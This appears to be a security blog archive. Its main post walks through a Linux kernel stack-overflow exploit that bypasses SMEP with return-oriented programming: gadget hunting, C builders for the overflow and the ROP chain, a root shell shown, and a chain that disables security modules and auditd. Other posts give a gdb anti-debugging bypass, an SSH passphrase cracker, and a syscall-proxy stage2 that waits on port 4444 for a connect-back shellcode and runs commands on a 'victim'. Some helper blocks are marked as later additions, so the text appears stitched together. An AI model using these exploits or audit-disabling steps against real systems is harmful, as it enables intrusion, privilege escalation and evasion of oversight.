Beat SMEP on Linux with Return-Oriented Programming

Introduction

In this post, I will show you how easy it is to use Return-Oriented Programming in the Linux kernel and how it can bypass protections such as SMEP, available in the next generation of Intel processors.

Linux buggy module

In order to simplify exploitation I have decided to develop a buggy driver containing a stack overflow.

Here is the important code (kbof.c):

struct kbof {
	size_t size;
	char *buf;
};

static int kbof_stackbof(struct kbof *kb)
{
	char buf[64];

	printk(KERN_INFO "kbof_stackbof: buf = %p size = %zu\n", kb->buf, kb->size);

	if (copy_from_user(buf, kb->buf, kb->size))
		return -EINVAL;

	return 0;
}

static long kbof_ioctl(struct file *fp, unsigned int cmd, unsigned long arg)
{
        struct kbof kb;

        if (copy_from_user(&kb, (struct kbof *)arg, sizeof(kb)))
                return -EINVAL;

        switch (cmd) {
        case KBOF_STACKOVF:
                return kbof_stackbof(&kb);
        }

        return 0;
}

This is a really simple stack overflow where you can control both the buffer and the length of the overflow.

This code path can be reached via an ioctl. The char device created for the module is /dev/kbof.

make
mknod /dev/kbof c 60 0
chmod 666 /dev/kbof
insmod ./kbof.ko

Finding the size of the overflow

First of all, we need to get the size of the overflow.
objdump gives us the answer :

kbof_stackbof:
push   %rbp
mov    %rsp,%rbp
push   %rbx
sub    $0x58,%rsp
...
mov    -0x20(%rbp),%rdx   # %rdx = size
mov    -0x18(%rbp),%rsi   # %rsi = src
lea    -0x60(%rbp),%rdi   # %rdi = buf
callq  0 
...
retq

The buffer is 0x60 bytes below %rbp (the Fedora kernel is compiled without -fomit-frame-pointer). So the return address is stored 104 bytes (0x60 + 0x8) after buf.
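
The offset computed above can be turned into a small helper that lays out the data handed to the driver. This is only a sketch: build_overflow and RET_OFFSET are names made up for illustration, and the words written after the padding are whatever the exploit wants on the stack from the return address onwards.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Distance from buf to the saved return address: buf sits at -0x60(%rbp),
 * the saved %rbp takes 8 bytes, and the return address follows it. */
#define RET_OFFSET (0x60 + 0x8)

/*
 * Fill `out` with RET_OFFSET bytes of padding followed by `n` 64-bit words
 * (the first word overwrites the return address). Returns the total number
 * of bytes written, or 0 if `out` is too small.
 * Hypothetical helper, not part of the original exploit.
 */
size_t build_overflow(unsigned char *out, size_t out_len,
                      const uint64_t *words, size_t n)
{
    size_t total = RET_OFFSET + n * sizeof(uint64_t);

    if (out_len < total)
        return 0;

    memset(out, 'A', RET_OFFSET);
    memcpy(out + RET_OFFSET, words, n * sizeof(uint64_t));
    return total;
}
```

The resulting buffer and its length would go into the buf and size fields of struct kbof before issuing the ioctl.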

SMEP vs kernel exploits

While the Linux kernel is easy to exploit and offers few protections, patches such as PaX or processor features such as SMEP make current exploits unusable.
SMEP is a feature that will be present in the next generation of Intel processors (Ivy Bridge). It prevents code in userspace pages (U/S=1 in the page table entry) from being executed in ring 0 (CPL=0).

[Figure : SMEP]

It means that we can’t jump to our exploit process address space and execute our payload (get root credentials, execute a shell). This is where ROP comes to our rescue : as we only return to code in the kernel address space (U/S=0), no fault will be triggered by the CPU.

Finding gadgets

To achieve successful ROP exploitation, we have to find gadgets in the Linux kernel image. As the kernel changes a lot, I used “git log” to find files that did not change much between releases. Several asm files (.S) in the arch/x86 directory have not changed in months. If we look at these files, we can see instruction sequences that are usable as gadgets :

arch/x86/lib/rwsem_64.S:

call_rwsem_downgrade_wake:
...
popq %r11
popq %r10
popq %r9
popq %r8
popq %rcx
popq %rsi
popq %rdi
ret

arch/x86/lib/rwlock.S:

__read_lock_failed:
decl (%rdi)
js __read_lock_failed
ret

To find other gadgets we have to disassemble the Linux kernel image.
An example of how to extract a gzip-compressed kernel image (1f8b0800 is the gzip signature) :

$ od -A d -t x1 /boot/vmlinuz-2.6.38.6-26.rc1.fc15.x86_64 | grep '1f 8b 08 00'
0017504 48 8d 83 c0 78 3a 00 ff e0 1f 8b 08 00 86 52 c8
$ dd if=/boot/vmlinuz-2.6.38.6-26.rc1.fc15.x86_64 bs=1 skip=17513 | zcat > vmlinux
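
Grepping the od output works here, but it would miss a signature that straddles two 16-byte od lines. As an alternative, here is a minimal sketch that scans a buffer (for instance the vmlinuz file read into memory) for the same four bytes. The function name find_gzip_offset is hypothetical.

```c
#include <stddef.h>
#include <string.h>

/*
 * Return the offset of the first gzip header (1f 8b 08 00) in `data`,
 * or -1 if none is found. Hypothetical helper for illustration.
 */
long find_gzip_offset(const unsigned char *data, size_t len)
{
    static const unsigned char sig[4] = { 0x1f, 0x8b, 0x08, 0x00 };

    /* Byte-by-byte scan, so the match does not depend on any alignment. */
    for (size_t i = 0; i + sizeof(sig) <= len; i++) {
        if (memcmp(data + i, sig, sizeof(sig)) == 0)
            return (long)i;
    }
    return -1;
}
```

Applied to the 16 bytes of the od line shown above, it returns 9, which added to the line offset 17504 gives the skip value 17513 used with dd.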

And we use objdump to find gadgets. For example :

$ objdump -d ./vmlinux | grep "mov    %rax,%rdi" -A1 | grep "callq" -B1
...
ffffffff8108fc6e:       48 89 c7                mov    %rax,%rdi
ffffffff8108fc71:       ff d2                   callq  *%rdx
...

objdump best ROP tool ever ! :D

Kernel ROP exploit

Current exploits trigger a kernel bug and redirect the execution to a function similar to kernelcode() :

void kernelcode()
{
        commit_creds(prepare_kernel_cred(NULL));
        asm volatile(
          "swapgs\n"
          "movq %0, 0x20(%%rsp)\n"
          "movq %1, 0x18(%%rsp)\n"
          "movq %2, 0x10(%%rsp)\n"
          "movq %3, 0x8(%%rsp)\n"
          "movq %4, 0x0(%%rsp)\n"
          "iretq\n"
          : : "r" (user_ss), "r" (stack + sizeof(stack) / 2),
              "r" (user_rflags), "r" (user_cs), "r" (userland_code));
}

This function gives root credentials to our process and returns to userland (CPL=3).
I decided to take the same approach for my ROP exploit.
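
kernelcode() relies on user_cs, user_ss and user_rflags having been saved before the bug is triggered. The sketch below shows one way this is commonly done from userland. The struct and function names are made up for illustration, and the code only captures anything when built for x86_64.

```c
#include <stdint.h>

/* Hypothetical container for the values needed to build an iretq frame. */
struct user_state {
    uint64_t cs, ss, rflags;
};

/* Returns 1 when the state was captured, 0 on non-x86_64 builds. */
int save_user_state(struct user_state *st)
{
#if defined(__x86_64__)
    uint64_t cs, ss, rflags;

    __asm__ volatile(
        "mov %%cs, %0\n\t"
        "mov %%ss, %1\n\t"
        /* step over the 128-byte red zone before pushing anything */
        "lea -128(%%rsp), %%rsp\n\t"
        "pushfq\n\t"
        "popq %2\n\t"
        "lea 128(%%rsp), %%rsp\n\t"
        : "=r"(cs), "=r"(ss), "=r"(rflags)
        :
        : "memory");

    st->cs = cs;
    st->ss = ss;
    st->rflags = rflags;
    return 1;
#else
    st->cs = st->ss = st->rflags = 0;
    return 0;
#endif
}
```

The lea instructions are used instead of sub/add because they leave the flags untouched, so the pushed %rflags value is the one the caller actually had.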

ROP : getting root privileges

Calling prepare_kernel_cred with the first argument set to NULL is easy. The following stack frame does this :

[ ... ]
[  POP_RDI_RET            ]
[  0UL                    ]
[  @prepare_kernel_cred   ]
[ ... ]

Remember that %rdi is defined as the first argument of a function by the x86_64 ABI.

But it’s tricky to get the return value of prepare_kernel_cred (%rax) and use it as the commit_creds argument (%rdi). With the help of objdump, we find an interesting sequence :

ffffffff8108fc6e:       48 89 c7                mov    %rax,%rdi
ffffffff8108fc71:       ff d2                   callq  *%rdx

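We can’t directly set %rdx to commit_creds because the call instruction pushes a return address on the stack, so commit_creds would return to the instruction after the call rather than to our chain. Instead, we point %rdx at a pop/ret gadget : the pop discards the pushed return address and the ret picks up the next entry of our payload, which is commit_creds. The final ROP payload below shows the full sequence.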

ROP : returning to userland

Now that we have root credentials on the machine, we would like to return to our userland process.
paranoid_swapgs is a good candidate :

paranoid_swapgs:
swapgs
[ restore registers ]
add    $0x30,%rsp
[ restore registers ]
add    $0x50,%rsp
jmpq   irq_return # iretq

Final ROP payload

And the final ROP payload is :

[  POP_RDI_RET           ]
[  0UL                   ]
[  @prepare_kernel_cred  ]
[  @POP_RDX_RCX_RET      ]
[  @POP_RCX_RET          ]
[  JUNK                  ]
[  @MOV_RAX_RDI_CALL_RDX ]
[  @commit_creds         ]
[  @paranoid_swapgs      ]
[  0x30 + 0x50 bytes junk]
[  @exec_shell           ]
[  user_cs               ]
[  user_rflags           ]
[  @stack                ]
[  user_ss               ]
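
For reference, the layout above can be written down as a small builder. This is a sketch under assumptions: struct rop_addrs, build_rop_chain and the JUNK value are illustrative names, and every address has to be resolved for the target kernel (the gadget addresses are not given in this post).

```c
#include <stddef.h>
#include <stdint.h>

#define JUNK 0x4141414141414141ULL

/* Addresses and saved user state; all values are placeholders to fill in. */
struct rop_addrs {
    uint64_t pop_rdi_ret;
    uint64_t pop_rdx_rcx_ret;
    uint64_t pop_rcx_ret;
    uint64_t mov_rax_rdi_call_rdx;
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
    uint64_t paranoid_swapgs;
    uint64_t exec_shell;            /* userland function run after iretq */
    uint64_t user_cs, user_rflags, user_stack, user_ss;
};

/* 9 chain entries, 0x30 + 0x50 bytes of junk, 5-word iretq frame */
#define ROP_CHAIN_WORDS (9 + (0x30 + 0x50) / 8 + 5)

/* Writes the chain into `chain`; returns the word count, or 0 if cap is too small. */
size_t build_rop_chain(uint64_t *chain, size_t cap, const struct rop_addrs *a)
{
    size_t i = 0;

    if (cap < ROP_CHAIN_WORDS)
        return 0;

    chain[i++] = a->pop_rdi_ret;
    chain[i++] = 0;                        /* %rdi = NULL */
    chain[i++] = a->prepare_kernel_cred;   /* %rax = new credentials */
    chain[i++] = a->pop_rdx_rcx_ret;
    chain[i++] = a->pop_rcx_ret;           /* -> %rdx, target of call *%rdx */
    chain[i++] = JUNK;                     /* -> %rcx */
    chain[i++] = a->mov_rax_rdi_call_rdx;  /* %rdi = %rax, then call *%rdx */
    chain[i++] = a->commit_creds;          /* reached via pop %rcx; ret */
    chain[i++] = a->paranoid_swapgs;
    for (size_t k = 0; k < (0x30 + 0x50) / 8; k++)
        chain[i++] = JUNK;                 /* area stepped over by the two adds */
    chain[i++] = a->exec_shell;            /* iretq frame: RIP */
    chain[i++] = a->user_cs;
    chain[i++] = a->user_rflags;
    chain[i++] = a->user_stack;
    chain[i++] = a->user_ss;
    return i;
}
```

The chain is then placed 104 bytes after the start of the buffer passed to the driver, so that its first word overwrites the saved return address.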

Time to test our exploit :

[falken@vm-F15 kernel_overflow]$ ./exploit_rop
[+] call_rwsem_downgrade_wake is at 0xffffffff81232500
[+] prepare_kernel_cred is at 0xffffffff81074718
[+] commit_creds is at 0xffffffff81074403
[+] paranoid_swapgs is at 0xffffffff8147611d
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0

W00t !

Bonus : disable security modules & auditd

Disabling security modules can be done by calling reset_security_ops :

static struct security_operations default_security_ops = {
        .name   = "default",
};
...
void reset_security_ops(void)
{
        security_ops = &default_security_ops;
}

In order to disable auditd we have to set the variable audit_enabled to 0. This variable is set to 1 when auditing is enabled.

In rwlock.S, we find the perfect gadget :

decl (%rdi)
js __read_lock_failed	# not taken since (%rdi) == 0
ret

And the corresponding stack frame will be :

[   @POP_RDI_RET          ]
[   @audit_enabled        ]
[   @DEC_RDI_ADDR_RET     ]
[   @reset_security_ops   ]

Other ideas to bypass SMEP

  • Disable SMEP by flipping the proper bit in CR4.
  • Allocate a RWX page, copy our shellcode and jump to it.
  • Store the ROP payload in userspace as SMEP does not prevent kernel code from accessing userland data.
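
For the first idea, SMEP is controlled by bit 20 of CR4. The arithmetic is sketched below. The helper names are hypothetical, and actually writing the new value to CR4 would still require a suitable gadget in the kernel image, which is not covered here.

```c
#include <stdint.h>

/* CR4 bit 20 enables SMEP. */
#define X86_CR4_SMEP (UINT64_C(1) << 20)

/* Hypothetical helpers: test and clear the SMEP bit in a CR4 value. */
static inline int cr4_smep_enabled(uint64_t cr4)
{
    return (cr4 & X86_CR4_SMEP) != 0;
}

static inline uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~X86_CR4_SMEP;
}
```

For example, a CR4 value of 0x1407f0 (made up for illustration) becomes 0x407f0 once the SMEP bit is cleared.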

Conclusion

For sure SMEP will make kernel exploitation harder. Combined with a relocatable kernel and hidden kernel symbols, the ROP technique presented here becomes very difficult to pull off… as long as there is no information leak.

Links & code :

SMEP: What is It, and How to Beat It on Linux
SMEP: What is it, and how to beat it on Windows

Buggy module + classic exploit + ROP exploit for kernel-2.6.38.6-26.rc1.fc15.x86_64 (default Fedora 15 kernel)

Bypass ptrace anti-debugging technique with gdb scripting

In this quick post I just want to show you how to use gdb scripting to bypass
the PTRACE_TRACEME anti-debugging technique.

ptrace(PTRACE_TRACEME) fails when the process is already being traced by a debugger. The following code implements such a check.

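#include <stdio.h>
#include <sys/ptrace.h>

int main(void)
{
	/* PTRACE_TRACEME fails if a tracer is already attached */
	if (ptrace(PTRACE_TRACEME, 1, 1, 1) < 0) {
		printf("Running in a debugger\n");
	} else {
		printf("Safe to run\n");
	}

	return 0;
}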

Let’s have a look at the disassembly :

   0x0000000000400534 <+0>:	push   rbp
   0x0000000000400535 <+1>:	mov    rbp,rsp
   0x0000000000400538 <+4>:	mov    ecx,0x1
   0x000000000040053d <+9>:	mov    edx,0x1
   0x0000000000400542 <+14>:	mov    esi,0x1
   0x0000000000400547 <+19>:	mov    edi,0x0
   0x000000000040054c <+24>:	mov    eax,0x0
   0x0000000000400551 <+29>:	call   0x400438 <ptrace@plt>
   0x0000000000400556 <+34>:	test   rax,rax
   0x0000000000400559 <+37>:	jns    0x400567 <main+51>
   0x000000000040055b <+39>:	mov    edi,0x40066c
   0x0000000000400560 <+44>:	call   0x400418 <puts@plt>
   0x0000000000400565 <+49>:	jmp    0x400571 <main+61>
   0x0000000000400567 <+51>:	mov    edi,0x400682
   0x000000000040056c <+56>:	call   0x400418 <puts@plt>
   0x0000000000400571 <+61>:	mov    eax,0x0
   0x0000000000400576 <+66>:	pop    rbp
   0x0000000000400577 <+67>:	ret

A simple solution to bypass the check is to modify %rax (ptrace return value) at main+34.

gdb$ b *0x0000000000400556
gdb$ r
Breakpoint 1, 0x0000000000400556 in main ()
gdb$ set $rax=0
gdb$ c
Safe to run
Program exited normally.

This is a really simple trick. To be more efficient while hacking, I have written
a gdb script that automates the whole process.

set $64BITS = 1
set $ptrace_bpnum = 0

define ptraceme
    catch syscall ptrace
    commands
        if ($64BITS == 0)
            if ($ebx == 0)
                set $eax = 0
                continue
            end
        else
            if ($rdi == 0)
                set $rax = 0
                continue
            end
        end
    end
    set $ptrace_bpnum = $bpnum
end
document ptraceme
Hook ptrace to bypass PTRACE_TRACEME anti debugging technique
end

define rptraceme
    if ($ptrace_bpnum != 0)
        delete $ptrace_bpnum
        set $ptrace_bpnum = 0
    end
end
document rptraceme
Remove ptrace hook
end

Add this script to your .gdbinit and use the ptraceme command to bypass the ptrace anti-debugging technique.

Parallel ssh private key cracker

Note : From now on, I have decided to write this blog in English to reach a broader audience.


I recently had to recover a lost passphrase for an SSH private key. I “googled” a bit and found two tools. Unfortunately, both of them were single-threaded, so I decided to write my own. The link is available at the end of this post.

Threads vs multiple processes

Since I am quite interested in parallelism, I am going to explain why, in my case, processes are a better fit than threads.

The following is an example of a single threaded ssh private key cracker found here :

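#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/evp.h>
#include <openssl/pem.h>
#include <openssl/ssl.h>

int
main(int argc, char *argv[])
{
 FILE *fp;
 EVP_PKEY *pk;
 char *ptr;
 char pwd[1024];

 if (argc < 2 || !(fp = fopen(argv[1], "r")))
 {
  fprintf(stderr, "usage: %s keyfile < wordlist\n", argv[0]);
  exit(1);
 }

 SSL_library_init();
 pwd[0] = '\0';
 while (1)
 {
  /* read the next candidate passphrase from stdin */
  if (!fgets(pwd, sizeof pwd, stdin))
  {
   printf("Password not found.\n");
   exit(0);
  }
  ptr = strchr(pwd, '\n');
  if (ptr)
   *ptr = '\0';
  /* each attempt must parse the key from the start of the file */
  rewind(fp);
  pk = PEM_read_PrivateKey(fp, NULL, NULL, (char *)pwd);
  if (pk)
  {
   printf("----> pwd is '%s' <-----\n", pwd);
   exit(0);
  }
 }

 return 0;
}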

If you are planning to use threads to parallelize the loop, you have to check which functions are thread safe. This is the case for almost every POSIX function (see man 7 pthreads). OpenSSL can safely be used in a multi-threaded application provided that two callbacks are registered, one returning the current thread id and one locking shared data structures (see man 3ssl threads).
Unfortunately, it seems that PEM_read_PrivateKey is still not thread safe even with these callbacks, which is not surprising since there are few reasons to call this function from several threads.

The basic workaround is to use code locking :

pthread_mutex_lock(&pk_lock);
pk = PEM_read_PrivateKey(fp, NULL, NULL, (char *)pwd);
pthread_mutex_unlock(&pk_lock);

By doing this, we completely annihilate the benefits of threading because PEM_read_PrivateKey, the most time-consuming function, will only ever run in one thread at a time. Remember, threading is not always the right choice when it comes to performance on multicore systems : it means shared data, and therefore probably locking, which may decrease performance. That's why I decided to use multiple processes : each process has its own copy of the data, so no locking is needed !
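
To make the multi-process idea concrete, here is a minimal sketch and not the code from the archive. It forks nproc workers, gives each one an interleaved slice of the word list, and reports the index of the matching word through a pipe. parallel_search is a hypothetical name, and demo_check is a stand-in for the real test, which would call PEM_read_PrivateKey on a file opened by each worker.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for the real check (PEM_read_PrivateKey succeeding). */
static int demo_check(const char *pw)
{
    return strcmp(pw, "hunter2") == 0;
}

/* Returns the index of the matching word, or -1 if none matched. */
long parallel_search(const char *const *words, size_t n, int nproc,
                     int (*try_pw)(const char *))
{
    int fds[2];
    long found = -1, idx;

    if (nproc < 1 || pipe(fds) < 0)
        return -1;

    for (int rank = 0; rank < nproc; rank++) {
        pid_t pid = fork();
        if (pid < 0)
            break;  /* this slice stays unsearched; a real tool should handle it */
        if (pid == 0) {
            close(fds[0]);
            /* worker `rank` tries words rank, rank + nproc, rank + 2*nproc, ... */
            for (size_t i = (size_t)rank; i < n; i += (size_t)nproc) {
                if (try_pw(words[i])) {
                    idx = (long)i;
                    if (write(fds[1], &idx, sizeof(idx)) != (ssize_t)sizeof(idx))
                        _exit(1);
                    break;
                }
            }
            _exit(0);
        }
    }

    close(fds[1]);
    /* blocks until a worker reports a hit or every worker has exited (EOF) */
    if (read(fds[0], &idx, sizeof(idx)) == (ssize_t)sizeof(idx))
        found = idx;
    close(fds[0]);
    while (wait(NULL) > 0)
        ;
    return found;
}
```

Because every worker owns its private copy of the data after fork(), no lock is needed around the expensive call. This sketch lets the remaining workers finish their slice after a hit; a real tool would probably kill them.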

Code + parallel programming documentation

The code can be found here :
http://falken.tuxfamily.org/uploads/ssh-pk-crack.tar.bz2

Parallel programming documentation:
An introduction to parallel programming
perfbook

Enjoy !

Installing security tools on Fedora

As you may know, Fedora offers a security spin that aims to bring together a number of security tools. Unfortunately, they cannot be installed via a package group (i.e. yum groupinstall). So I wrote a small script that fetches the package list and installs it :

#!/bin/bash

if [ `whoami` != "root" ]
then
	echo "This script must be run as root"
	exit 127
fi

PKGS=$(curl https://fedorahosted.org/security-spin/wiki/availableApps 2>/dev/null | \
	python -c "import re; \
		   import sys; \
		   print(\" \".join(re.findall('([a-zA-Z0-9]*)</span>', str(sys.stdin.readlines()))))")

yum install -y ${PKGS}

Userspace spinlocks

A little trick using gcc builtins to write synchronization functions in a few lines of code :

typedef int spinlock_t;

static inline void spin_lock(spinlock_t *lock)
{
        while (__sync_lock_test_and_set(lock, 1));
}

static inline void spin_unlock(spinlock_t *lock)
{
        __sync_lock_release(lock);
}

static inline void spin_lock_init(spinlock_t *lock)
{
        *lock = 0;
}

These builtins map to test-and-set style instructions, which are essential for building synchronization mechanisms. The gcc builtin functions are documented here : http://gcc.gnu.org/onlinedocs/gcc-4.4.4/gcc/Atomic-Builtins.html
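
As a usage sketch, here are the same three functions protecting a shared counter incremented by several threads. run_counter_demo, worker and the 16-thread cap are made up for this example, and it needs to be built with -pthread.

```c
#include <pthread.h>
#include <stddef.h>

typedef int spinlock_t;

static inline void spin_lock(spinlock_t *lock)
{
        while (__sync_lock_test_and_set(lock, 1));
}

static inline void spin_unlock(spinlock_t *lock)
{
        __sync_lock_release(lock);
}

static inline void spin_lock_init(spinlock_t *lock)
{
        *lock = 0;
}

static spinlock_t counter_lock;
static long counter;

/* Each worker increments the shared counter `*arg` times under the lock. */
static void *worker(void *arg)
{
        long iterations = *(long *)arg;

        for (long i = 0; i < iterations; i++) {
                spin_lock(&counter_lock);
                counter++;
                spin_unlock(&counter_lock);
        }
        return NULL;
}

/* Returns the final counter value, or -1 on error. Hypothetical demo helper. */
long run_counter_demo(int nthreads, long iterations)
{
        pthread_t tids[16];
        int started = 0;

        if (nthreads < 1 || nthreads > 16)
                return -1;

        spin_lock_init(&counter_lock);
        counter = 0;
        for (; started < nthreads; started++) {
                if (pthread_create(&tids[started], NULL, worker, &iterations) != 0)
                        break;
        }
        for (int i = 0; i < started; i++)
                pthread_join(tids[i], NULL);

        return started == nthreads ? counter : -1;
}
```

Without the lock, the increments from different threads could interleave and the final value would typically come out lower than nthreads * iterations.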

For the curious, here is the assembly obtained with objdump :

0000000000400614 <spin_lock>:
  400614:       55                      push   %rbp
  400615:       48 89 e5                mov    %rsp,%rbp
  400618:       48 89 7d f8             mov    %rdi,-0x8(%rbp)
  40061c:       90                      nop
  40061d:       48 8b 55 f8             mov    -0x8(%rbp),%rdx
  400621:       b8 01 00 00 00          mov    $0x1,%eax
  400626:       87 02                   xchg   %eax,(%rdx)
  400628:       85 c0                   test   %eax,%eax
  40062a:       75 f1                   jne    40061d <spin_lock+0x9>
  40062c:       c9                      leaveq
  40062d:       c3                      retq
000000000040062e <spin_unlock>:
  40062e:       55                      push   %rbp
  40062f:       48 89 e5                mov    %rsp,%rbp
  400632:       48 89 7d f8             mov    %rdi,-0x8(%rbp)
  400636:       48 8b 45 f8             mov    -0x8(%rbp),%rax
  40063a:       0f ae f0                mfence /* serialization */
  40063d:       c7 00 00 00 00 00       movl   $0x0,(%rax)
  400643:       c9                      leaveq
  400644:       c3                      retq

A note for connoisseurs : the xchg instruction is atomic when one of its operands is a memory address. If that were not the case, two threads could end up in the critical section at the same time.
I'll let you guess how :)

Syscall proxy updates

I have heavily modified the shellcode that acts as the syscall proxy : it is now fetched onto the victim machine by a connect-back shellcode.

Exploitation therefore proceeds in this order :

- we start stage2 (see stage2.c), which waits for the reverse_tcp shellcode to connect
- we exploit the vulnerability by injecting the reverse_tcp shellcode (stage1)
- the reverse_tcp shellcode connects to our stage2
- stage2 sends the syscall proxy shellcode
- we can now execute system calls on the target machine
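
To give an idea of what the last step involves on the attacker side, here is a sketch of how a request could be packed before being sent over the socket. The wire format, struct sp_request and sp_pack_request are all assumptions made up for illustration; they are not the format used by the shellcode in the archive.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical wire format: fixed header followed by raw payload bytes. */
struct sp_request {
    uint32_t nr;           /* syscall number */
    uint32_t payload_len;  /* bytes of data following the header */
    uint32_t args[6];      /* raw syscall arguments */
};

/*
 * Serialize one request into `out`. Returns the number of bytes written,
 * or 0 if `out` is too small.
 */
size_t sp_pack_request(unsigned char *out, size_t cap, uint32_t nr,
                       const uint32_t args[6],
                       const void *payload, uint32_t payload_len)
{
    struct sp_request hdr;
    size_t total = sizeof(hdr) + payload_len;

    if (cap < total)
        return 0;

    hdr.nr = nr;
    hdr.payload_len = payload_len;
    memcpy(hdr.args, args, sizeof(hdr.args));

    memcpy(out, &hdr, sizeof(hdr));
    if (payload_len > 0)
        memcpy(out + sizeof(hdr), payload, payload_len);
    return total;
}
```

A real syscall proxy also has to deal with pointer arguments, which must be rewritten to point into the remote process once the payload has been copied there. That part is left out of this sketch.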

stage2.c:

#include "libc_sp.h"

int main(void)
{
	int sock = wait_connect_back(4444);

	/* send the syscall proxy shellcode */
	send_sp_shellcode(sock);

	/* the system calls are executed on the victim machine */
	sp_write(1, "Hello\n", 6);
	sp_write(1, "Youpi\n", 6);

	char *args[] = {"/bin/ls",  "-l", "/", NULL};
	sp_execve(args[0], args, NULL);

	return 0;
}

As for the reverse_tcp shellcode, I wrote a small C program that generates the connect-back with the right ip/port pair :
./gen_shell ip port

The archive is available here : syscall_proxy.tar.bz2

Syscall proxying

OMG, I found a piece of code I wrote a while ago that does syscall proxying.
For those who want to know more about this technique, M. Caceres's slides are here : Syscall Proxying

I don't reverse Windows for breakfast, so if you have corrections for the asm, send me an email.
The shellcode does not do a bind + accept; instead it receives the socket at ebp+8, like a regular IA32 asm function.

You will find the code here

AMD64 red zone

This post describes a small peculiarity of stack management on the AMD64 architecture : the red zone. I'll show you right away what it is with an example.

void leaf_func(void)
{
	int j = 0;
}
void func(void)
{
	int i = 0;
	leaf_func();
}
int main(void)
{
	func();
	return 0;
}

Which gives, in assembly :

Dump of assembler code for function leaf_func:
   0x0000000000400474 <+0>:	push   %rbp
   0x0000000000400475 <+1>:	mov    %rsp,%rbp
   0x0000000000400478 <+4>:	movl   $0x0,-0x4(%rbp)
   0x000000000040047f <+11>:	leaveq
   0x0000000000400480 <+12>:	retq

Dump of assembler code for function func:
   0x0000000000400481 <+0>:	push   %rbp
   0x0000000000400482 <+1>:	mov    %rsp,%rbp
   0x0000000000400485 <+4>:	sub    $0x10,%rsp
   0x0000000000400489 <+8>:	movl   $0x0,-0x4(%rbp)
   0x0000000000400490 <+15>:	mov    $0x0,%eax
   0x0000000000400495 <+20>:	callq  0x400474
   0x000000000040049a <+25>:	leaveq
   0x000000000040049b <+26>:	retq

See the difference between the two functions ? “func” makes room on the stack for its local variables (here i) with sub $0x10, %rsp, which “leaf_func” does not. “leaf_func” uses the area below %rsp to store the variable j.
In fact, “leaf_func” does not call any other function, so it can use the area below %rsp without risking j being overwritten. This is the red zone. It is the 128 bytes below %rsp and can be used as a stack frame by “leaf” functions (i.e. functions that call no other function) or as scratch space, to swap two variables for example (a function call will overwrite the red zone).

Here is what the stack looks like on AMD64 :

[ saved RIP ]
[ saved RBP ] <---- %rbp
[   local   ]
[    ...    ]
[ variables ] <---- %rsp (16-byte aligned)
[ red-zone  ]
[    ...    ]
[redzone end] <----- -128(%rsp)

This layout has a few advantages :

  • %rsp always points to the end of the stack frame, which means variables can be addressed relative to %rsp and %rbp can be used as a general-purpose register
  • “leaf” functions can use the red zone directly as their stack frame

For more information, see here (section 3.2.2)

If you are developing your own OS, I recommend compiling with the -mno-red-zone option : when a software interrupt is triggered, the red zone may be overwritten when the CPU saves %ss, %rsp, %rflags, %cs and %rip on the stack in kernel mode. If a kernel function is preempted by a soft interrupt while it is using the red zone, its temporary variables will be overwritten, and that is going to hurt when the function resumes execution.

Hello world

Like everyone else, I'm starting my blog :-)

Enjoy.
